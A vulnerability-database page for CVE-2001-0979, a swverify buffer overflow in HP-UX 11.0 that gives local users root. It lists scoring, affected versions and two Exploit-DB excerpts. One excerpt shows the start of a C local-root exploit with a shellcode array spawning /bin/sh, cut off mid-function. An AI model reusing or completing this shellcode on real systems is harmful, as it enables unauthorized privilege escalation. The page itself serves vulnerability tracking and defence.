CVE-2001-0979
published 2001-09-03CVE-2001-0979: Buffer overflow in swverify in HP-UX 11.0, and possibly other programs, allows local users to gain privileges via a long command line argument.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.55%
72.1th percentile
Buffer overflow in swverify in HP-UX 11.0, and possibly other programs, allows local users to gain privileges via a long command line argument.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
exploitdb·2002-12-11
CVE-2001-0979 HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
---
/*
Program : x_hpux_11i_sw.c
Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
Complie : cc x_hpux_11i_sw.c -o x_sw;./x_sw ( not use gcc for some system)
Usage : ./x_sw [ off ]
Tested : HP-UX B11.11 & HP-UX B11.0
Author : watercloud [@] xfocus.org
Date : 2002-12-11
Note : Use as your own risk !!
*/
#include
#define T_LEN 2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
"/bin/shA";
long addr;
char buffer_env[2496];
char buffer[T_LEN];
void main(argc,argv)
int argc;
char ** argv;
{
int addr_off = 8208;
long a
Exploit-DB
HP-UX 11.0 - SWVerify Buffer Overflow
exploitdb·2001-09-03
CVE-2001-0979 HP-UX 11.0 - SWVerify Buffer Overflow
HP-UX 11.0 - SWVerify Buffer Overflow
---
// source: https://www.securityfocus.com/bid/3279/info
HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems.
A problem has been discovered in the operating system that can allow a local user to gain elevated privileges. swverify contains a buffer overflow which is exploitable upon receiving 6039 bytes as an argument. The swverify program is setuid root, which allows a local user to execute code as root, potentially gaining administrative access to the vulnerable system.
/*
Copyright FOO
This code may be distributed freely so long as it is kept in its entirety.
http://www.counterpane.com/crypto-gram-0108.html#1
"I have long said t
No writeups or analysis indexed.
2001-09-03
Published